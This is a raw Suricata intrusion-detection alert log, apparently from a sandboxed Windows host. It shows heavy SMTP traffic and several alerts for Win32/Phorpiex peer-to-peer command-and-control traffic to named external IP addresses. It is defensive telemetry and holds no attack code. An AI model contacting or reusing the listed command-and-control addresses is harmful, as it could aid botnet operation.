TCP 98.136.96.92:25 -> 192.168.56.103:49589 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49632 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49532 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49635 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49639 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49537 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49521 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49657 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49636 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49555 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49645 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49543 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49571 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49546 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49550 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49551 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49558 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49575 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49577 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49586 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49595 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49608 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49610 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49612 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49590 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49609 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49928 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49617 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49938 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49641 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49952 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49649 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49648 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49678 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49666 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49690 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49697 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49693 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49700 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49698 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49719 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49725 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49755 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49744 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49761 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49746 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49685 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49748 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49706 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49582 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49583 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49647 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49656 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49667 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49732 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49738 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49798 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49801 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49715 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49809 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49711 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49830 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49727 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49729 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49885 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49752 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49907 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49765 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49767 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49950 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49958 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49951 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49989 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49990 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49995 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50009 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49956 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49969 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50031 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50055 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50057 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50058 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49779 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49784 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49790 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49795 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49815 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49672 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49772 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49754 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49676 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49805 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49839 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49689 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49695 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49850 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49836 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49861 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49699 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49702 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49873 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49710 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49716 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49882 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49745 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49927 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49948 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49762 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49773 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49792 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49803 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49806 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49832 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49972 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49837 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49982 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49872 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50006 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50010 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49902 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50018 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49897 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49917 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49920 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49933 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49935 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49931 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50060 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49949 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50079 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50084 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49962 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50101 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49975 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50108 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49976 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50147 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50169 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49984 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50176 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50184 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50014 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50195 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50205 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50212 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50213 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50020 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50227 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50247 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50252 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50043 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50257 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50053 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50270 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50090 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50093 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50299 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49845 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50306 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50308 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50319 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49847 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49851 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49858 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49863 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49867 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50107 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49865 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49870 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49888 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50392 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50127 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49900 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49910 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50389 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 2.185.163.114:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:49932 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49981 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49922 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49980 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49937 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50002 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49961 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50027 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49992 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50063 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 95.58.72.245:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:50011 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50017 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49814 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50074 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50044 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50077 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49818 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 109.74.35.21:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 144.160.235.143:25 -> 192.168.56.103:50102 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50059 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50105 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50109 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50075 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50114 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50088 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50122 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50398 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50130 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50133 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50138 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50116 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50112 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50163 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50156 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50172 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50155 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 109.74.43.21:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:50181 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50192 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50187 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50142 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50144 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50194 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50149 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50202 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50174 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50185 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49842 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50193 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50189 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50190 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49857 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49855 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50197 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49899 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50244 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
